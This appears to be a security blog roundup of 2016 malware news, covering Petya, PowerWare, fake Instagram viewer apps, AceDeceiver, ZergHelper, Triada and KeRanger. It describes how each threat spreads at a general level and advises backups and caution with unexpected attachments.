Ransomware Petya encrypts not files but whole hard drive

To achieve its goal, the attacker sends out innocuous looking email that purports to be from a job applicant, with instructions to download a CV hosted in a Dropbox folder. When following the link, an EXE file is downloaded. When running the exe file, the PC crashes with a bluescreen and reboots. Prior to the reboot, the Master Boot Record (MBR) of the system is manipulated in a way which allows Petya to control the boot process.

Petya sets itself apart by the volume of data it tries to encrypt. While most ransomware are content encrypting single files, usually documents that seem important, Petya goes for the entire hard drive instead. After the user unwittingly runs the ransomware carrying program, Petya takes over the bootloaded and restarts the computer. Then it will display a screen informing the user that Windows is performing a check disk operation when, in fact, it is already tying to encrypt the entire disk in the process. Once done, it reveals its true colors, literally, directing the victim to browse to a specific website using TOR for anonymity. The website, in turn, contains instructions on how to pay the ransom. The ransom doubles in price after 7 days.

newp

We recommend not paying the requested ransom and as soon as you read this blog, ensure that all your data is backed up. That way, you can just copy that image back across, should the worst happen.

This is by no means the first ransomware online, it’s part of a worrying trend that seems to line up businesses as more lucrative victims than individuals – one hospital this year has already paid $17,000 in bitcoins after it was locked out of its network.

As with many of these attacks, Petya relies on computer users clicking links sent in emails before really considering what they are, or the potential implications. One sure-fire way to cut down on these is just to simply refuse to open random files from people you don’t know. Be careful , do not open any attachments of click on any links that you have no concern about or not expecting.

PowerWare uses Windows PowerShell to encrypt files

PowerWare a crypto-ransomware, how it is different from other crypto malware is that it is fileless, which is a tactic adopted by other malware families pushed in prolific exploit kits such as Angler. A malware family called PowerSniff has similar behaviors to PowerWare, including fileless infections.

Criminal gangs behind PowerWare are spreading it using spam messages including a Word document attachment purporting to be an invoice. The attackers use an old trick in order to convince victims in enabling the macros, they request to enable macros to correctly view the document.

The macros runs the cmd.exe which launches the PowerShell, the native Windows framework that uses a command-line shell to perform several tasks. The program that actually does all the encrypting of the files is PowerShell. A script is downloaded and fed to PowerShell. This means no ‘traditional’ malware – no additional executable needed – just a text document (script).

The use of PowerShell allows the ransomware to avoid writing files to the disk and make hard the threat detection. It also allows the ransomware to encrypt files on the victim’s PC. The PowerShell ransomware requests victims to pay a $500 ransom to restored the encrypted files. Also in this case, the ransom double if the victim’s doesn’t respect the deadline.

Who viewed me on Instagram

Recently, a malicious application called “InstaCare – Who cares with me” was released via Google Play Store and App Store. This application serves as a hook to lure Instagram users, pretending to let them know who has viewed their profile; but in reality it abuses the authentication process to connect to Instagram. It steals your instagram password and gains access to your profile.

This app displays your friend list in order, who cares your profile most with your profile interaction. This app can show you up to most recent 100 list for your Instagram profile.

instagram_IMG

It’s common for many applications to use API’s or authorization protocols such as OAuth to authenticate with third-party applications. This is very convenient for users as they can use the same credentials to authenticate with different applications and services. The problem here is that this feature can be used maliciously for some applications to gain access to the user’s information, such as their profile and contacts, or to steal their credentials.

Last week the InstaAgent developer “Turker Bayram” released a new app for the Android and iOS AppStore, after his (malicious) app “InstaAgent” was pulled by Apple&Google from their AppStores. It was astonishing that Apple and Google didn’t have a closer look at his new application. One should assume a developer who already published a malicious app, should be watched more closely. His new app is called “Who Viewed Me on Instagram” (Android Version 50K – 100K downloads), and “InstaCare – Who cares with me?” (iOS Version top grossing app in Germany Category: Entertainment). The app promises the same functionality as InstaAgent .

iPhones can get infected even if they are not jail broken

A brand new malware strain is just discovered, a sneaky attacks that has fooled not only Apple’s app review team into allowing malware apps into the App Store, but that can also quietly install apps on any iOS device without the user’s explicit knowledge or permission. A jailbreak status is not even needed for the attack to work.

AceDeceiver is the first iOS malware we’ve seen that abuses certain design flaws in Apple’s DRM protection mechanism — namely FairPlay — to install malicious apps on iOS devices regardless of whether they are jailbroken. The attack requires a PC to deploy the software. Called AceDeceiver, the malware is currently affecting users in China. Three AceDeceiver apps disguised as wallpaper tools made their way onto the App Store between July 2015 and February 2016.

This is not the first iOS malware that we have seen in the recent times. Researchers found a strain of malware called YiSpecter that targeted jailbroken as well as non-jailbroken devices in Taiwan and China. The app, however, leveraged private APIs that are signed with enterprise certificates to look authentic.

As for AceDeceiver, only users in China seem to be affected for now. However, it adds, that with slight tweaks, users in other regions can also be targeted. Apple normally prides itself on iOS’ security, but has still had to periodically remove App Store titles because of dangerous code.

Chinese App creates another App Store inside Apple’s iOS App Store

An iOS app that provided access to pirated apps successfully got through Apple’s strict approval process. The Chinese developers of an app called Happy Daily English have found a way to go around Apple’s review process and embed a fully functional iOS app store inside their application and had it hosted on the official iOS App Store itself.

For non-Chinese users, the app would be a simple educational app that taught Chinese users English, but for Chinese users, the app would transform itself into an app store that allowed them to install rogue, pirated or cracked apps using various tricks, without requiring users to go through the side-loading process.

The app got approved and added to Apple’s website when the iOS App Store reviewers accessed the app, from somewhere outside China, and didn’t notice anything strange, seeing its educational interface. On top of this, ZergHelper was coded in Lua, a programming language that allowed the developers to dynamically update the app, but without going through Apple’s app review process. This technique allowed the developers to change the app’s behavior without the risk of being discovered during subsequent updates.

The malicious store-in-store app existed on the official App Store from October 30, 2015, to February 19, 2016. Apple removed the app after it was reported by its discoverer.

Triada Trojan Exists in memory and uses Zygote process to Hook all Applications on Android

Dubbed Triada (Backdoor.AndroidOS.Triada), this malware family was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user. The Triada Trojan is able to infiltrate all process running on the mobile devices gaining persistence. The Android malware is spread through an “advertising botnet” that was used by crooks to spread also other threats, including Leech, Ztorg, and Gorpo and AndroidOS.Iop.

The Triada trojan was clearly developed by cybercriminals who have a clear understanding of how Android functions at a core level and a tremendous amount of research and work went into developing this malware.

It also marks the first time that malware developed for Android has the same complexity as malware written for Windows. Before now most of the threats encountered on mobile devices were not nearly as well developed and were very primitive in nature.
Users are more at risk of being affected by Triada if they download and install apps from unknown sources as opposed to from the Google Play Store.

New OS X Ransomware ‘KeRanger’ encrypts Mac files

Ransomware, one of the fastest-growing types of cyber threats, encrypts data on infected machines, then typically asks users to pay ransoms in hard-to-trace digital currencies to get an electronic key so they can retrieve their data.

Security experts estimate that ransoms total hundreds of millions of dollars a year from such cyber criminals, who typically target users of Microsoft’s Windows operating system.

KeRanger is the name given to what is believed to be the “first fully functional” ransomware on the OS X platform. When incorporated into an app, the malware connects to a remote server via the Tor anonymizing service, then “begins encrypting certain types of document and data files on the system.”

The malware then “demands that victims pay one bitcoin (about $400) to a specific address to retrieve their files.” Researchers say the malicious code is “under active development” and seems to be trying to also encrypt users’ Time Machine backups to also prevent them from being able to recover their backed up data.

Transmission BitTorrent client installer for OS X was infected with ransomware, who directly installed Transmission between March 4th and March 5th may be infected with the KeRanger malware. Apple has already revoked the certificate, anyone attempting to open a known-infected version of the Transmission app will now be given a warning dialog box that notes “Transmission.app will damage your computer. You should move it to the Trash,” or “Transmission can’t be opened. You should eject the disk image.”